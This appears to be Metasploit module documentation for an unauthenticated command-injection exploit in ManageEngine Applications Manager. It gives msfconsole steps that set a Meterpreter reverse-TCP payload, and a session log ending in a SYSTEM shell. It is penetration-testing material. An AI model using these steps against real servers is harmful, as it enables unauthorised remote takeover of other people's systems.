## Vulnerable Application This module exploits command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer. **Vulnerable Application Installation Steps** Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else. [http://archives.manageengine.com/applications_manager/13630/](http://archives.manageengine.com/applications_manager/13630/) ## Verification Steps A successful check of the exploit will look like this: * Start `msfconsole` * `use exploit/windows/http/manageengine_appmanager_exec` * Set `RHOST ` * Set `PAYLOAD windows/meterpreter/reverse_tcp` * Set `LHOST ` * Run `check` * **Verify** that you are seeing `The target is vulnerable.` in console. * Run `exploit` * **Verify** that you are seeing `Triggering the vulnerability` in console. * **Verify** that you are seeing `Sending stage to ` in console. * **Verify** that you have your shell. ## Scenarios ``` msf5 > msf5 > use exploit/windows/http/manageengine_appmanager_exec msf5 exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192 RHOST => 12.0.0.192 msf5 exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 msf5 exploit(windows/http/manageengine_appmanager_exec) > check [+] 12.0.0.192:9090 The target is vulnerable. msf5 exploit(windows/http/manageengine_appmanager_exec) > run [*] Started reverse TCP handler on 12.0.0.1:4444 [*] Trigerring the vulnerability [*] Sending stage (179779 bytes) to 12.0.0.192 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ```